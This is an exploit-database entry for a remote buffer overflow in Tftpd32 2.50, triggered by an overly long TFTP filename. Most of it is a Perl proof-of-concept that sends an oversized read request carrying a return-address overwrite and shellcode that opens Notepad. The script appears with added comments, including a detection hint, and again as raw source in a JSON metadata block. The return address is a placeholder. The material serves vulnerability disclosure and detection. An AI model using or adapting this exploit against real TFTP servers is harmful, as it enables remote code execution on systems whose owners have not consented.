TFTPD32 2.50 Long Filename Buffer Overflow Vulnerability
2014-07-01T00:00:00
ID SSV:75838 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/6199/info
A buffer-overflow vulnerability has been reported for Tftpd32. The vulnerability is due to insufficient checks on user-supplied input.
A remote attacker can exploit this vulnerability by supplying an overly long string as the name of the file to retrieve, which triggers the buffer-overflow condition. Any attacker-supplied code then runs with the privileges of the Tftpd32 process. TFTP requests are unauthenticated, so any host that can reach the server's UDP port can send such a request.
#!/usr/bin/perl
#TFTP Server remote Buffer Overflow
#
# Proof of concept for the Tftpd32 long-filename overflow described above
# (SecurityFocus BID 6199). The script builds one TFTP request datagram whose
# filename field is far longer than a legitimate path and sends it over UDP.
# It never reads a reply.
#
# Datagram layout, in the order the script appends to $buf:
#   2 bytes    opcode
#   258 bytes  filler: "A", 116 x "A", ".", 140 x "A"
#   4 bytes    $address
#   63 bytes   $egg (machine code, the string "notepad.exe", six 0x90 bytes)
#   1 byte     NUL ending the filename field
#   7 bytes    "binary" plus NUL as the mode field
#
# Detection: a read or write request on UDP/69 whose filename runs to hundreds
# of bytes and contains non-printable bytes is not normal TFTP traffic.
#
# The script has no strict/warnings, so every variable is a package global and
# $buf is first touched with .= while still undefined.
use IO::Socket;
# Hard-coded destination: a private (RFC 1918) address and the standard TFTP port.
$host = "192.168.1.53";
$port = "69";
# Filler byte repeated to pad the filename field.
$data = "A";
#$buf .= "\x00\x02"; # Send ---- Choose one
$buf .= "\x00\x01"; # Receive: opcode 1, read request (RRQ)
# The filename field starts here; nothing below appends a NUL until the mode string.
$buf .= "A";
$num = "116";
$buf .= $data x $num;
$buf .= ".";
$num = "140"; # EIP section
$buf .= $data x $num;
# Four bytes placed directly after the filler; the author's "EIP section" label
# marks this as the value meant to land on the saved instruction pointer.
# NOTE(review): 0xFFFFFFFF looks like a placeholder rather than a working
# address - confirm.
$address = "\xFF\xFF\xFF\xFF";
$buf .= $address;
# Payload appended after the overwritten value. The bytes are opaque machine
# code followed by the ASCII string "notepad.exe"; the closing print states the
# intent is to start Notepad on the target as visible evidence of execution.
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";
# Six 0x90 bytes (the x86 NOP opcode) as trailing padding.
$egg .= "\x90\x90\x90\x90\x90\x90";
$buf .= $egg;
# NUL ends the oversized filename; "binary" plus NUL fills the mode field.
# RFC 1350 names the transfer modes netascii, octet and mail.
$buf .= "\x00binary\x00";
# Unconnected UDP socket: only the protocol is set, the destination is passed to send().
$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:
$@\n";
# Falls back to the raw $host string if inet_aton() returns false.
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);
# Dies unless send() reports the full datagram length as sent.
send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send:
$!\n";
# Printed whenever the send succeeds. No response is read, so this states what
# the author expects to happen on the target, not a confirmed result.
print "Now, '$host' should open up a notepad\n";
{"lastseen": "2017-11-19T14:20:07", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2017-11-19T14:20:07", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:20:07", "rev": 2}, "vulnersScore": 0.3}, "href": "https://www.seebug.org/vuldb/ssvid-75838", "references": [], "enchantments_done": [], "id": "SSV:75838", "title": "TFTPD32 2.50 Long Filename Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 2, "sourceData": "\n source: http://www.securityfocus.com/bid/6199/info\r\n\r\nA buffer-overflow vulnerability has been reported for Tftpd32. The vulnerability is due to insufficient checks on user-supplied input. \r\n\r\nA remote attacker can exploit this vulnerability by supplying a long string as a name of the file to retrieve. This will trigger the buffer-overflow condition. 
Any malicious attacker-supplied code will be executed with the privileges of the Tftpd32 process.\r\n\r\n#!/usr/bin/perl\r\n#TFTP Server remote Buffer Overflow\r\nuse IO::Socket;\r\n$host = "192.168.1.53";\r\n$port = "69";\r\n$data = "A";\r\n\r\n#$buf .= "\\x00\\x02"; # Send ---- Choose one\r\n$buf .= "\\x00\\x01"; # Recieve\r\n\r\n$buf .= "A";\r\n$num = "116";\r\n$buf .= $data x $num;\r\n$buf .= ".";\r\n$num = "140"; # EIP section\r\n$buf .= $data x $num;\r\n\r\n$address = "\\xFF\\xFF\\xFF\\xFF";\r\n$buf .= $address;\r\n\r\n$egg = "\\xEB\\x27\\x8B\\x34\\x24\\x33\\xC9\\x33\\xD2\\xB2";\r\n$egg .= "\\x0B\\x03\\xF2\\x88\\x0E\\x2B\\xF2\\xB8\\xAF\\xA7";\r\n$egg .= "\\xE6\\x77\\xB1\\x05\\xB2\\x04\\x2B\\xE2\\x89\\x0C";\r\n$egg .= "\\x24\\x2B\\xE2\\x89\\x34\\x24\\xFF\\xD0\\x90\\xEB";\r\n$egg .= "\\xFD\\xE8\\xD4\\xFF\\xFF\\xFF";\r\n$egg .= "notepad.exe";\r\n\r\n$egg .= "\\x90\\x90\\x90\\x90\\x90\\x90";\r\n$buf .= $egg;\r\n\r\n$buf .= "\\x00binary\\x00";\r\n\r\n$socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error:\r\n$@\\n";\r\n$ipaddr = inet_aton($host) || $host;\r\n$portaddr = sockaddr_in($port, $ipaddr);\r\nsend($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send:\r\n$!\\n";\r\nprint "Now, '$host' should open up a notepad\\n";\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-75838", "type": "seebug"}